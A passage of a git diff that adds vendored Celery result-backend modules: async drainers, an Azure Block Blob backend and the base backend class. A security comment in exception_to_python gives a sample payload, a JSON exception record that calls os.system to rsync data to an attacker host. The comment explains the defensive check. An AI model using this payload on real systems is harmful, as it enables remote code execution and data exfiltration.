+ break + + def wait_for(self, p, wait, timeout=None): + wait(timeout=timeout) + + +class greenletDrainer(Drainer): + spawn = None + _g = None + _drain_complete_event = None # event, sended (and recreated) after every drain_events iteration + + def _create_drain_complete_event(self): + """create new self._drain_complete_event object""" + pass + + def _send_drain_complete_event(self): + """raise self._drain_complete_event for wakeup .wait_for""" + pass + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self._started = threading.Event() + self._stopped = threading.Event() + self._shutdown = threading.Event() + self._create_drain_complete_event() + + def run(self): + self._started.set() + while not self._stopped.is_set(): + try: + self.result_consumer.drain_events(timeout=1) + self._send_drain_complete_event() + self._create_drain_complete_event() + except socket.timeout: + pass + self._shutdown.set() + + def start(self): + if not self._started.is_set(): + self._g = self.spawn(self.run) + self._started.wait() + + def stop(self): + self._stopped.set() + self._send_drain_complete_event() + self._shutdown.wait(THREAD_TIMEOUT_MAX) + + def wait_for(self, p, wait, timeout=None): + self.start() + if not p.ready: + self._drain_complete_event.wait(timeout=timeout) + + +@register_drainer('eventlet') +class eventletDrainer(greenletDrainer): + + def spawn(self, func): + from eventlet import sleep, spawn + g = spawn(func) + sleep(0) + return g + + def _create_drain_complete_event(self): + from eventlet.event import Event + self._drain_complete_event = Event() + + def _send_drain_complete_event(self): + self._drain_complete_event.send() + + +@register_drainer('gevent') +class geventDrainer(greenletDrainer): + + def spawn(self, func): + import gevent + g = gevent.spawn(func) + gevent.sleep(0) + return g + + def _create_drain_complete_event(self): + from gevent.event import Event + self._drain_complete_event = Event() + + def _send_drain_complete_event(self): + self._drain_complete_event.set() + self._create_drain_complete_event() + + +class AsyncBackendMixin: + """Mixin for backends that enables the async API.""" + + def _collect_into(self, result, bucket): + self.result_consumer.buckets[result] = bucket + + def iter_native(self, result, no_ack=True, **kwargs): + self._ensure_not_eager() + + results = result.results + if not results: + raise StopIteration() + + # we tell the result consumer to put consumed results + # into these buckets. 
+ bucket = deque() + for node in results: + if not hasattr(node, '_cache'): + bucket.append(node) + elif node._cache: + bucket.append(node) + else: + self._collect_into(node, bucket) + + for _ in self._wait_for_pending(result, no_ack=no_ack, **kwargs): + while bucket: + node = bucket.popleft() + if not hasattr(node, '_cache'): + yield node.id, node.children + else: + yield node.id, node._cache + while bucket: + node = bucket.popleft() + yield node.id, node._cache + + def add_pending_result(self, result, weak=False, start_drainer=True): + if start_drainer: + self.result_consumer.drainer.start() + try: + self._maybe_resolve_from_buffer(result) + except Empty: + self._add_pending_result(result.id, result, weak=weak) + return result + + def _maybe_resolve_from_buffer(self, result): + result._maybe_set_cache(self._pending_messages.take(result.id)) + + def _add_pending_result(self, task_id, result, weak=False): + concrete, weak_ = self._pending_results + if task_id not in weak_ and result.id not in concrete: + (weak_ if weak else concrete)[task_id] = result + self.result_consumer.consume_from(task_id) + + def add_pending_results(self, results, weak=False): + self.result_consumer.drainer.start() + return [self.add_pending_result(result, weak=weak, start_drainer=False) + for result in results] + + def remove_pending_result(self, result): + self._remove_pending_result(result.id) + self.on_result_fulfilled(result) + return result + + def _remove_pending_result(self, task_id): + for mapping in self._pending_results: + mapping.pop(task_id, None) + + def on_result_fulfilled(self, result): + self.result_consumer.cancel_for(result.id) + + def wait_for_pending(self, result, + callback=None, propagate=True, **kwargs): + self._ensure_not_eager() + for _ in self._wait_for_pending(result, **kwargs): + pass + return result.maybe_throw(callback=callback, propagate=propagate) + + def _wait_for_pending(self, result, + timeout=None, on_interval=None, on_message=None, + **kwargs): + return self.result_consumer._wait_for_pending( + result, timeout=timeout, + on_interval=on_interval, on_message=on_message, + **kwargs + ) + + @property + def is_async(self): + return True + + +class BaseResultConsumer: + """Manager responsible for consuming result messages.""" + + def __init__(self, backend, app, accept, + pending_results, pending_messages): + self.backend = backend + self.app = app + self.accept = accept + self._pending_results = pending_results + self._pending_messages = pending_messages + self.on_message = None + self.buckets = WeakKeyDictionary() + self.drainer = drainers[detect_environment()](self) + + def start(self, initial_task_id, **kwargs): + raise NotImplementedError() + + def stop(self): + pass + + def drain_events(self, timeout=None): + raise NotImplementedError() + + def consume_from(self, task_id): + raise NotImplementedError() + + def cancel_for(self, task_id): + raise NotImplementedError() + + def _after_fork(self): + self.buckets.clear() + self.buckets = WeakKeyDictionary() + self.on_message = None + self.on_after_fork() + + def on_after_fork(self): + pass + + def drain_events_until(self, p, timeout=None, on_interval=None): + return self.drainer.drain_events_until( + p, timeout=timeout, on_interval=on_interval) + + def _wait_for_pending(self, result, + timeout=None, on_interval=None, on_message=None, + **kwargs): + self.on_wait_for_pending(result, timeout=timeout, **kwargs) + prev_on_m, self.on_message = self.on_message, on_message + try: + for _ in self.drain_events_until( + result.on_ready, 
timeout=timeout, + on_interval=on_interval): + yield + sleep(0) + except socket.timeout: + raise TimeoutError('The operation timed out.') + finally: + self.on_message = prev_on_m + + def on_wait_for_pending(self, result, timeout=None, **kwargs): + pass + + def on_out_of_band_result(self, message): + self.on_state_change(message.payload, message) + + def _get_pending_result(self, task_id): + for mapping in self._pending_results: + try: + return mapping[task_id] + except KeyError: + pass + raise KeyError(task_id) + + def on_state_change(self, meta, message): + if self.on_message: + self.on_message(meta) + if meta['status'] in states.READY_STATES: + task_id = meta['task_id'] + try: + result = self._get_pending_result(task_id) + except KeyError: + # send to buffer in case we received this result + # before it was added to _pending_results. + self._pending_messages.put(task_id, meta) + else: + result._maybe_set_cache(meta) + buckets = self.buckets + try: + # remove bucket for this result, since it's fulfilled + bucket = buckets.pop(result) + except KeyError: + pass + else: + # send to waiter via bucket + bucket.append(result) + sleep(0) diff --git a/env/Lib/site-packages/celery/backends/azureblockblob.py b/env/Lib/site-packages/celery/backends/azureblockblob.py new file mode 100644 index 00000000..862777b5 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/azureblockblob.py @@ -0,0 +1,165 @@ +"""The Azure Storage Block Blob backend for Celery.""" +from kombu.utils import cached_property +from kombu.utils.encoding import bytes_to_str + +from celery.exceptions import ImproperlyConfigured +from celery.utils.log import get_logger + +from .base import KeyValueStoreBackend + +try: + import azure.storage.blob as azurestorage + from azure.core.exceptions import ResourceExistsError, ResourceNotFoundError + from azure.storage.blob import BlobServiceClient +except ImportError: + azurestorage = None + +__all__ = ("AzureBlockBlobBackend",) + +LOGGER = get_logger(__name__) +AZURE_BLOCK_BLOB_CONNECTION_PREFIX = 'azureblockblob://' + + +class AzureBlockBlobBackend(KeyValueStoreBackend): + """Azure Storage Block Blob backend for Celery.""" + + def __init__(self, + url=None, + container_name=None, + *args, + **kwargs): + super().__init__(*args, **kwargs) + + if azurestorage is None or azurestorage.__version__ < '12': + raise ImproperlyConfigured( + "You need to install the azure-storage-blob v12 library to" + "use the AzureBlockBlob backend") + + conf = self.app.conf + + self._connection_string = self._parse_url(url) + + self._container_name = ( + container_name or + conf["azureblockblob_container_name"]) + + self.base_path = conf.get('azureblockblob_base_path', '') + self._connection_timeout = conf.get( + 'azureblockblob_connection_timeout', 20 + ) + self._read_timeout = conf.get('azureblockblob_read_timeout', 120) + + @classmethod + def _parse_url(cls, url, prefix=AZURE_BLOCK_BLOB_CONNECTION_PREFIX): + connection_string = url[len(prefix):] + if not connection_string: + raise ImproperlyConfigured("Invalid URL") + + return connection_string + + @cached_property + def _blob_service_client(self): + """Return the Azure Storage Blob service client. + + If this is the first call to the property, the client is created and + the container is created if it doesn't yet exist. 
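        For orientation, an illustrative backend URL as consumed by
        ``_parse_url()`` above (all connection-string values are
        placeholders)::

            azureblockblob://DefaultEndpointsProtocol=https;AccountName=myaccount;AccountKey=***;EndpointSuffix=core.windows.net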
+ + """ + client = BlobServiceClient.from_connection_string( + self._connection_string, + connection_timeout=self._connection_timeout, + read_timeout=self._read_timeout + ) + + try: + client.create_container(name=self._container_name) + msg = f"Container created with name {self._container_name}." + except ResourceExistsError: + msg = f"Container with name {self._container_name} already." \ + "exists. This will not be created." + LOGGER.info(msg) + + return client + + def get(self, key): + """Read the value stored at the given key. + + Args: + key: The key for which to read the value. + """ + key = bytes_to_str(key) + LOGGER.debug("Getting Azure Block Blob %s/%s", self._container_name, key) + + blob_client = self._blob_service_client.get_blob_client( + container=self._container_name, + blob=f'{self.base_path}{key}', + ) + + try: + return blob_client.download_blob().readall().decode() + except ResourceNotFoundError: + return None + + def set(self, key, value): + """Store a value for a given key. + + Args: + key: The key at which to store the value. + value: The value to store. + + """ + key = bytes_to_str(key) + LOGGER.debug(f"Creating azure blob at {self._container_name}/{key}") + + blob_client = self._blob_service_client.get_blob_client( + container=self._container_name, + blob=f'{self.base_path}{key}', + ) + + blob_client.upload_blob(value, overwrite=True) + + def mget(self, keys): + """Read all the values for the provided keys. + + Args: + keys: The list of keys to read. + + """ + return [self.get(key) for key in keys] + + def delete(self, key): + """Delete the value at a given key. + + Args: + key: The key of the value to delete. + + """ + key = bytes_to_str(key) + LOGGER.debug(f"Deleting azure blob at {self._container_name}/{key}") + + blob_client = self._blob_service_client.get_blob_client( + container=self._container_name, + blob=f'{self.base_path}{key}', + ) + + blob_client.delete_blob() + + def as_uri(self, include_password=False): + if include_password: + return ( + f'{AZURE_BLOCK_BLOB_CONNECTION_PREFIX}' + f'{self._connection_string}' + ) + + connection_string_parts = self._connection_string.split(';') + account_key_prefix = 'AccountKey=' + redacted_connection_string_parts = [ + f'{account_key_prefix}**' if part.startswith(account_key_prefix) + else part + for part in connection_string_parts + ] + + return ( + f'{AZURE_BLOCK_BLOB_CONNECTION_PREFIX}' + f'{";".join(redacted_connection_string_parts)}' + ) diff --git a/env/Lib/site-packages/celery/backends/base.py b/env/Lib/site-packages/celery/backends/base.py new file mode 100644 index 00000000..4216c3b3 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/base.py @@ -0,0 +1,1110 @@ +"""Result backend base classes. + +- :class:`BaseBackend` defines the interface. + +- :class:`KeyValueStoreBackend` is a common base class + using K/V semantics like _get and _put. 
+""" +import sys +import time +import warnings +from collections import namedtuple +from datetime import datetime, timedelta +from functools import partial +from weakref import WeakValueDictionary + +from billiard.einfo import ExceptionInfo +from kombu.serialization import dumps, loads, prepare_accept_content +from kombu.serialization import registry as serializer_registry +from kombu.utils.encoding import bytes_to_str, ensure_bytes +from kombu.utils.url import maybe_sanitize_url + +import celery.exceptions +from celery import current_app, group, maybe_signature, states +from celery._state import get_current_task +from celery.app.task import Context +from celery.exceptions import (BackendGetMetaError, BackendStoreError, ChordError, ImproperlyConfigured, + NotRegistered, SecurityError, TaskRevokedError, TimeoutError) +from celery.result import GroupResult, ResultBase, ResultSet, allow_join_result, result_from_tuple +from celery.utils.collections import BufferMap +from celery.utils.functional import LRUCache, arity_greater +from celery.utils.log import get_logger +from celery.utils.serialization import (create_exception_cls, ensure_serializable, get_pickleable_exception, + get_pickled_exception, raise_with_context) +from celery.utils.time import get_exponential_backoff_interval + +__all__ = ('BaseBackend', 'KeyValueStoreBackend', 'DisabledBackend') + +EXCEPTION_ABLE_CODECS = frozenset({'pickle'}) + +logger = get_logger(__name__) + +MESSAGE_BUFFER_MAX = 8192 + +pending_results_t = namedtuple('pending_results_t', ( + 'concrete', 'weak', +)) + +E_NO_BACKEND = """ +No result backend is configured. +Please see the documentation for more information. +""" + +E_CHORD_NO_BACKEND = """ +Starting chords requires a result backend to be configured. + +Note that a group chained with a task is also upgraded to be a chord, +as this pattern requires synchronization. + +Result backends that supports chords: Redis, Database, Memcached, and more. +""" + + +def unpickle_backend(cls, args, kwargs): + """Return an unpickled backend.""" + return cls(*args, app=current_app._get_current_object(), **kwargs) + + +class _nulldict(dict): + def ignore(self, *a, **kw): + pass + + __setitem__ = update = setdefault = ignore + + +def _is_request_ignore_result(request): + if request is None: + return False + return request.ignore_result + + +class Backend: + READY_STATES = states.READY_STATES + UNREADY_STATES = states.UNREADY_STATES + EXCEPTION_STATES = states.EXCEPTION_STATES + + TimeoutError = TimeoutError + + #: Time to sleep between polling each individual item + #: in `ResultSet.iterate`. as opposed to the `interval` + #: argument which is for each pass. + subpolling_interval = None + + #: If true the backend must implement :meth:`get_many`. + supports_native_join = False + + #: If true the backend must automatically expire results. + #: The daily backend_cleanup periodic task won't be triggered + #: in this case. + supports_autoexpire = False + + #: Set to true if the backend is persistent by default. 
+ persistent = True + + retry_policy = { + 'max_retries': 20, + 'interval_start': 0, + 'interval_step': 1, + 'interval_max': 1, + } + + def __init__(self, app, + serializer=None, max_cached_results=None, accept=None, + expires=None, expires_type=None, url=None, **kwargs): + self.app = app + conf = self.app.conf + self.serializer = serializer or conf.result_serializer + (self.content_type, + self.content_encoding, + self.encoder) = serializer_registry._encoders[self.serializer] + cmax = max_cached_results or conf.result_cache_max + self._cache = _nulldict() if cmax == -1 else LRUCache(limit=cmax) + + self.expires = self.prepare_expires(expires, expires_type) + + # precedence: accept, conf.result_accept_content, conf.accept_content + self.accept = conf.result_accept_content if accept is None else accept + self.accept = conf.accept_content if self.accept is None else self.accept + self.accept = prepare_accept_content(self.accept) + + self.always_retry = conf.get('result_backend_always_retry', False) + self.max_sleep_between_retries_ms = conf.get('result_backend_max_sleep_between_retries_ms', 10000) + self.base_sleep_between_retries_ms = conf.get('result_backend_base_sleep_between_retries_ms', 10) + self.max_retries = conf.get('result_backend_max_retries', float("inf")) + self.thread_safe = conf.get('result_backend_thread_safe', False) + + self._pending_results = pending_results_t({}, WeakValueDictionary()) + self._pending_messages = BufferMap(MESSAGE_BUFFER_MAX) + self.url = url + + def as_uri(self, include_password=False): + """Return the backend as an URI, sanitizing the password or not.""" + # when using maybe_sanitize_url(), "/" is added + # we're stripping it for consistency + if include_password: + return self.url + url = maybe_sanitize_url(self.url or '') + return url[:-1] if url.endswith(':///') else url + + def mark_as_started(self, task_id, **meta): + """Mark a task as started.""" + return self.store_result(task_id, meta, states.STARTED) + + def mark_as_done(self, task_id, result, + request=None, store_result=True, state=states.SUCCESS): + """Mark task as successfully executed.""" + if (store_result and not _is_request_ignore_result(request)): + self.store_result(task_id, result, state, request=request) + if request and request.chord: + self.on_chord_part_return(request, state, result) + + def mark_as_failure(self, task_id, exc, + traceback=None, request=None, + store_result=True, call_errbacks=True, + state=states.FAILURE): + """Mark task as executed with failure.""" + if store_result: + self.store_result(task_id, exc, state, + traceback=traceback, request=request) + if request: + # This task may be part of a chord + if request.chord: + self.on_chord_part_return(request, state, exc) + # It might also have chained tasks which need to be propagated to, + # this is most likely to be exclusive with being a direct part of a + # chord but we'll handle both cases separately. + # + # The `chain_data` try block here is a bit tortured since we might + # have non-iterable objects here in tests and it's easier this way. 
+ try: + chain_data = iter(request.chain) + except (AttributeError, TypeError): + chain_data = tuple() + for chain_elem in chain_data: + # Reconstruct a `Context` object for the chained task which has + # enough information to for backends to work with + chain_elem_ctx = Context(chain_elem) + chain_elem_ctx.update(chain_elem_ctx.options) + chain_elem_ctx.id = chain_elem_ctx.options.get('task_id') + chain_elem_ctx.group = chain_elem_ctx.options.get('group_id') + # If the state should be propagated, we'll do so for all + # elements of the chain. This is only truly important so + # that the last chain element which controls completion of + # the chain itself is marked as completed to avoid stalls. + # + # Some chained elements may be complex signatures and have no + # task ID of their own, so we skip them hoping that not + # descending through them is OK. If the last chain element is + # complex, we assume it must have been uplifted to a chord by + # the canvas code and therefore the condition below will ensure + # that we mark something as being complete as avoid stalling. + if ( + store_result and state in states.PROPAGATE_STATES and + chain_elem_ctx.task_id is not None + ): + self.store_result( + chain_elem_ctx.task_id, exc, state, + traceback=traceback, request=chain_elem_ctx, + ) + # If the chain element is a member of a chord, we also need + # to call `on_chord_part_return()` as well to avoid stalls. + if 'chord' in chain_elem_ctx.options: + self.on_chord_part_return(chain_elem_ctx, state, exc) + # And finally we'll fire any errbacks + if call_errbacks and request.errbacks: + self._call_task_errbacks(request, exc, traceback) + + def _call_task_errbacks(self, request, exc, traceback): + old_signature = [] + for errback in request.errbacks: + errback = self.app.signature(errback) + if not errback._app: + # Ensure all signatures have an application + errback._app = self.app + try: + if ( + # Celery tasks type created with the @task decorator have + # the __header__ property, but Celery task created from + # Task class do not have this property. + # That's why we have to check if this property exists + # before checking is it partial function. + hasattr(errback.type, '__header__') and + + # workaround to support tasks with bind=True executed as + # link errors. Otherwise, retries can't be used + not isinstance(errback.type.__header__, partial) and + arity_greater(errback.type.__header__, 1) + ): + errback(request, exc, traceback) + else: + old_signature.append(errback) + except NotRegistered: + # Task may not be present in this worker. + # We simply send it forward for another worker to consume. + # If the task is not registered there, the worker will raise + # NotRegistered. + old_signature.append(errback) + + if old_signature: + # Previously errback was called as a task so we still + # need to do so if the errback only takes a single task_id arg. 
+ task_id = request.id + root_id = request.root_id or task_id + g = group(old_signature, app=self.app) + if self.app.conf.task_always_eager or request.delivery_info.get('is_eager', False): + g.apply( + (task_id,), parent_id=task_id, root_id=root_id + ) + else: + g.apply_async( + (task_id,), parent_id=task_id, root_id=root_id + ) + + def mark_as_revoked(self, task_id, reason='', + request=None, store_result=True, state=states.REVOKED): + exc = TaskRevokedError(reason) + if store_result: + self.store_result(task_id, exc, state, + traceback=None, request=request) + if request and request.chord: + self.on_chord_part_return(request, state, exc) + + def mark_as_retry(self, task_id, exc, traceback=None, + request=None, store_result=True, state=states.RETRY): + """Mark task as being retries. + + Note: + Stores the current exception (if any). + """ + return self.store_result(task_id, exc, state, + traceback=traceback, request=request) + + def chord_error_from_stack(self, callback, exc=None): + app = self.app + try: + backend = app._tasks[callback.task].backend + except KeyError: + backend = self + # We have to make a fake request since either the callback failed or + # we're pretending it did since we don't have information about the + # chord part(s) which failed. This request is constructed as a best + # effort for new style errbacks and may be slightly misleading about + # what really went wrong, but at least we call them! + fake_request = Context({ + "id": callback.options.get("task_id"), + "errbacks": callback.options.get("link_error", []), + "delivery_info": dict(), + **callback + }) + try: + self._call_task_errbacks(fake_request, exc, None) + except Exception as eb_exc: # pylint: disable=broad-except + return backend.fail_from_current_stack(callback.id, exc=eb_exc) + else: + return backend.fail_from_current_stack(callback.id, exc=exc) + + def fail_from_current_stack(self, task_id, exc=None): + type_, real_exc, tb = sys.exc_info() + try: + exc = real_exc if exc is None else exc + exception_info = ExceptionInfo((type_, exc, tb)) + self.mark_as_failure(task_id, exc, exception_info.traceback) + return exception_info + finally: + while tb is not None: + try: + tb.tb_frame.clear() + tb.tb_frame.f_locals + except RuntimeError: + # Ignore the exception raised if the frame is still executing. 
+ pass + tb = tb.tb_next + + del tb + + def prepare_exception(self, exc, serializer=None): + """Prepare exception for serialization.""" + serializer = self.serializer if serializer is None else serializer + if serializer in EXCEPTION_ABLE_CODECS: + return get_pickleable_exception(exc) + exctype = type(exc) + return {'exc_type': getattr(exctype, '__qualname__', exctype.__name__), + 'exc_message': ensure_serializable(exc.args, self.encode), + 'exc_module': exctype.__module__} + + def exception_to_python(self, exc): + """Convert serialized exception to Python exception.""" + if not exc: + return None + elif isinstance(exc, BaseException): + if self.serializer in EXCEPTION_ABLE_CODECS: + exc = get_pickled_exception(exc) + return exc + elif not isinstance(exc, dict): + try: + exc = dict(exc) + except TypeError as e: + raise TypeError(f"If the stored exception isn't an " + f"instance of " + f"BaseException, it must be a dictionary.\n" + f"Instead got: {exc}") from e + + exc_module = exc.get('exc_module') + try: + exc_type = exc['exc_type'] + except KeyError as e: + raise ValueError("Exception information must include " + "the exception type") from e + if exc_module is None: + cls = create_exception_cls( + exc_type, __name__) + else: + try: + # Load module and find exception class in that + cls = sys.modules[exc_module] + # The type can contain qualified name with parent classes + for name in exc_type.split('.'): + cls = getattr(cls, name) + except (KeyError, AttributeError): + cls = create_exception_cls(exc_type, + celery.exceptions.__name__) + exc_msg = exc.get('exc_message', '') + + # If the recreated exception type isn't indeed an exception, + # this is a security issue. Without the condition below, an attacker + # could exploit a stored command vulnerability to execute arbitrary + # python code such as: + # os.system("rsync /data attacker@192.168.56.100:~/data") + # The attacker sets the task's result to a failure in the result + # backend with the os as the module, the system function as the + # exception type and the payload + # rsync /data attacker@192.168.56.100:~/data + # as the exception arguments like so: + # { + # "exc_module": "os", + # "exc_type": "system", + # "exc_message": "rsync /data attacker@192.168.56.100:~/data" + # } + if not isinstance(cls, type) or not issubclass(cls, BaseException): + fake_exc_type = exc_type if exc_module is None else f'{exc_module}.{exc_type}' + raise SecurityError( + f"Expected an exception class, got {fake_exc_type} with payload {exc_msg}") + + # XXX: Without verifying `cls` is actually an exception class, + # an attacker could execute arbitrary python code. + # cls could be anything, even eval(). 
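        # For orientation (illustrative, mirroring prepare_exception() above):
        # a JSON-serialized failure reaches this method roughly as
        #     {'exc_type': 'ValueError', 'exc_module': 'builtins',
        #      'exc_message': ['bad value']}
        # and the block below rebuilds it as ValueError('bad value').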
+ try: + if isinstance(exc_msg, (tuple, list)): + exc = cls(*exc_msg) + else: + exc = cls(exc_msg) + except Exception as err: # noqa + exc = Exception(f'{cls}({exc_msg})') + + return exc + + def prepare_value(self, result): + """Prepare value for storage.""" + if self.serializer != 'pickle' and isinstance(result, ResultBase): + return result.as_tuple() + return result + + def encode(self, data): + _, _, payload = self._encode(data) + return payload + + def _encode(self, data): + return dumps(data, serializer=self.serializer) + + def meta_from_decoded(self, meta): + if meta['status'] in self.EXCEPTION_STATES: + meta['result'] = self.exception_to_python(meta['result']) + return meta + + def decode_result(self, payload): + return self.meta_from_decoded(self.decode(payload)) + + def decode(self, payload): + if payload is None: + return payload + payload = payload or str(payload) + return loads(payload, + content_type=self.content_type, + content_encoding=self.content_encoding, + accept=self.accept) + + def prepare_expires(self, value, type=None): + if value is None: + value = self.app.conf.result_expires + if isinstance(value, timedelta): + value = value.total_seconds() + if value is not None and type: + return type(value) + return value + + def prepare_persistent(self, enabled=None): + if enabled is not None: + return enabled + persistent = self.app.conf.result_persistent + return self.persistent if persistent is None else persistent + + def encode_result(self, result, state): + if state in self.EXCEPTION_STATES and isinstance(result, Exception): + return self.prepare_exception(result) + return self.prepare_value(result) + + def is_cached(self, task_id): + return task_id in self._cache + + def _get_result_meta(self, result, + state, traceback, request, format_date=True, + encode=False): + if state in self.READY_STATES: + date_done = datetime.utcnow() + if format_date: + date_done = date_done.isoformat() + else: + date_done = None + + meta = { + 'status': state, + 'result': result, + 'traceback': traceback, + 'children': self.current_task_children(request), + 'date_done': date_done, + } + + if request and getattr(request, 'group', None): + meta['group_id'] = request.group + if request and getattr(request, 'parent_id', None): + meta['parent_id'] = request.parent_id + + if self.app.conf.find_value_for_key('extended', 'result'): + if request: + request_meta = { + 'name': getattr(request, 'task', None), + 'args': getattr(request, 'args', None), + 'kwargs': getattr(request, 'kwargs', None), + 'worker': getattr(request, 'hostname', None), + 'retries': getattr(request, 'retries', None), + 'queue': request.delivery_info.get('routing_key') + if hasattr(request, 'delivery_info') and + request.delivery_info else None, + } + if getattr(request, 'stamps', None): + request_meta['stamped_headers'] = request.stamped_headers + request_meta.update(request.stamps) + + if encode: + # args and kwargs need to be encoded properly before saving + encode_needed_fields = {"args", "kwargs"} + for field in encode_needed_fields: + value = request_meta[field] + encoded_value = self.encode(value) + request_meta[field] = ensure_bytes(encoded_value) + + meta.update(request_meta) + + return meta + + def _sleep(self, amount): + time.sleep(amount) + + def store_result(self, task_id, result, state, + traceback=None, request=None, **kwargs): + """Update task state and result. 
+ + if always_retry_backend_operation is activated, in the event of a recoverable exception, + then retry operation with an exponential backoff until a limit has been reached. + """ + result = self.encode_result(result, state) + + retries = 0 + + while True: + try: + self._store_result(task_id, result, state, traceback, + request=request, **kwargs) + return result + except Exception as exc: + if self.always_retry and self.exception_safe_to_retry(exc): + if retries < self.max_retries: + retries += 1 + + # get_exponential_backoff_interval computes integers + # and time.sleep accept floats for sub second sleep + sleep_amount = get_exponential_backoff_interval( + self.base_sleep_between_retries_ms, retries, + self.max_sleep_between_retries_ms, True) / 1000 + self._sleep(sleep_amount) + else: + raise_with_context( + BackendStoreError("failed to store result on the backend", task_id=task_id, state=state), + ) + else: + raise + + def forget(self, task_id): + self._cache.pop(task_id, None) + self._forget(task_id) + + def _forget(self, task_id): + raise NotImplementedError('backend does not implement forget.') + + def get_state(self, task_id): + """Get the state of a task.""" + return self.get_task_meta(task_id)['status'] + + get_status = get_state # XXX compat + + def get_traceback(self, task_id): + """Get the traceback for a failed task.""" + return self.get_task_meta(task_id).get('traceback') + + def get_result(self, task_id): + """Get the result of a task.""" + return self.get_task_meta(task_id).get('result') + + def get_children(self, task_id): + """Get the list of subtasks sent by a task.""" + try: + return self.get_task_meta(task_id)['children'] + except KeyError: + pass + + def _ensure_not_eager(self): + if self.app.conf.task_always_eager and not self.app.conf.task_store_eager_result: + warnings.warn( + "Results are not stored in backend and should not be retrieved when " + "task_always_eager is enabled, unless task_store_eager_result is enabled.", + RuntimeWarning + ) + + def exception_safe_to_retry(self, exc): + """Check if an exception is safe to retry. + + Backends have to overload this method with correct predicates dealing with their exceptions. + + By default no exception is safe to retry, it's up to backend implementation + to define which exceptions are safe. + """ + return False + + def get_task_meta(self, task_id, cache=True): + """Get task meta from backend. + + if always_retry_backend_operation is activated, in the event of a recoverable exception, + then retry operation with an exponential backoff until a limit has been reached. 
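        The retry behaviour is driven by the settings read in
        ``Backend.__init__`` (illustrative snippet showing the defaults used
        by this module)::

            result_backend_always_retry = False
            result_backend_max_retries = float("inf")
            result_backend_base_sleep_between_retries_ms = 10
            result_backend_max_sleep_between_retries_ms = 10000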
+ """ + self._ensure_not_eager() + if cache: + try: + return self._cache[task_id] + except KeyError: + pass + retries = 0 + while True: + try: + meta = self._get_task_meta_for(task_id) + break + except Exception as exc: + if self.always_retry and self.exception_safe_to_retry(exc): + if retries < self.max_retries: + retries += 1 + + # get_exponential_backoff_interval computes integers + # and time.sleep accept floats for sub second sleep + sleep_amount = get_exponential_backoff_interval( + self.base_sleep_between_retries_ms, retries, + self.max_sleep_between_retries_ms, True) / 1000 + self._sleep(sleep_amount) + else: + raise_with_context( + BackendGetMetaError("failed to get meta", task_id=task_id), + ) + else: + raise + + if cache and meta.get('status') == states.SUCCESS: + self._cache[task_id] = meta + return meta + + def reload_task_result(self, task_id): + """Reload task result, even if it has been previously fetched.""" + self._cache[task_id] = self.get_task_meta(task_id, cache=False) + + def reload_group_result(self, group_id): + """Reload group result, even if it has been previously fetched.""" + self._cache[group_id] = self.get_group_meta(group_id, cache=False) + + def get_group_meta(self, group_id, cache=True): + self._ensure_not_eager() + if cache: + try: + return self._cache[group_id] + except KeyError: + pass + + meta = self._restore_group(group_id) + if cache and meta is not None: + self._cache[group_id] = meta + return meta + + def restore_group(self, group_id, cache=True): + """Get the result for a group.""" + meta = self.get_group_meta(group_id, cache=cache) + if meta: + return meta['result'] + + def save_group(self, group_id, result): + """Store the result of an executed group.""" + return self._save_group(group_id, result) + + def delete_group(self, group_id): + self._cache.pop(group_id, None) + return self._delete_group(group_id) + + def cleanup(self): + """Backend cleanup.""" + + def process_cleanup(self): + """Cleanup actions to do at the end of a task worker process.""" + + def on_task_call(self, producer, task_id): + return {} + + def add_to_chord(self, chord_id, result): + raise NotImplementedError('Backend does not support add_to_chord') + + def on_chord_part_return(self, request, state, result, **kwargs): + pass + + def set_chord_size(self, group_id, chord_size): + pass + + def fallback_chord_unlock(self, header_result, body, countdown=1, + **kwargs): + kwargs['result'] = [r.as_tuple() for r in header_result] + try: + body_type = getattr(body, 'type', None) + except NotRegistered: + body_type = None + + queue = body.options.get('queue', getattr(body_type, 'queue', None)) + + if queue is None: + # fallback to default routing if queue name was not + # explicitly passed to body callback + queue = self.app.amqp.router.route(kwargs, body.name)['queue'].name + + priority = body.options.get('priority', getattr(body_type, 'priority', 0)) + self.app.tasks['celery.chord_unlock'].apply_async( + (header_result.id, body,), kwargs, + countdown=countdown, + queue=queue, + priority=priority, + ) + + def ensure_chords_allowed(self): + pass + + def apply_chord(self, header_result_args, body, **kwargs): + self.ensure_chords_allowed() + header_result = self.app.GroupResult(*header_result_args) + self.fallback_chord_unlock(header_result, body, **kwargs) + + def current_task_children(self, request=None): + request = request or getattr(get_current_task(), 'request', None) + if request: + return [r.as_tuple() for r in getattr(request, 'children', [])] + + def __reduce__(self, args=(), 
kwargs=None): + kwargs = {} if not kwargs else kwargs + return (unpickle_backend, (self.__class__, args, kwargs)) + + +class SyncBackendMixin: + def iter_native(self, result, timeout=None, interval=0.5, no_ack=True, + on_message=None, on_interval=None): + self._ensure_not_eager() + results = result.results + if not results: + return + + task_ids = set() + for result in results: + if isinstance(result, ResultSet): + yield result.id, result.results + else: + task_ids.add(result.id) + + yield from self.get_many( + task_ids, + timeout=timeout, interval=interval, no_ack=no_ack, + on_message=on_message, on_interval=on_interval, + ) + + def wait_for_pending(self, result, timeout=None, interval=0.5, + no_ack=True, on_message=None, on_interval=None, + callback=None, propagate=True): + self._ensure_not_eager() + if on_message is not None: + raise ImproperlyConfigured( + 'Backend does not support on_message callback') + + meta = self.wait_for( + result.id, timeout=timeout, + interval=interval, + on_interval=on_interval, + no_ack=no_ack, + ) + if meta: + result._maybe_set_cache(meta) + return result.maybe_throw(propagate=propagate, callback=callback) + + def wait_for(self, task_id, + timeout=None, interval=0.5, no_ack=True, on_interval=None): + """Wait for task and return its result. + + If the task raises an exception, this exception + will be re-raised by :func:`wait_for`. + + Raises: + celery.exceptions.TimeoutError: + If `timeout` is not :const:`None`, and the operation + takes longer than `timeout` seconds. + """ + self._ensure_not_eager() + + time_elapsed = 0.0 + + while 1: + meta = self.get_task_meta(task_id) + if meta['status'] in states.READY_STATES: + return meta + if on_interval: + on_interval() + # avoid hammering the CPU checking status. + time.sleep(interval) + time_elapsed += interval + if timeout and time_elapsed >= timeout: + raise TimeoutError('The operation timed out.') + + def add_pending_result(self, result, weak=False): + return result + + def remove_pending_result(self, result): + return result + + @property + def is_async(self): + return False + + +class BaseBackend(Backend, SyncBackendMixin): + """Base (synchronous) result backend.""" + + +BaseDictBackend = BaseBackend # XXX compat + + 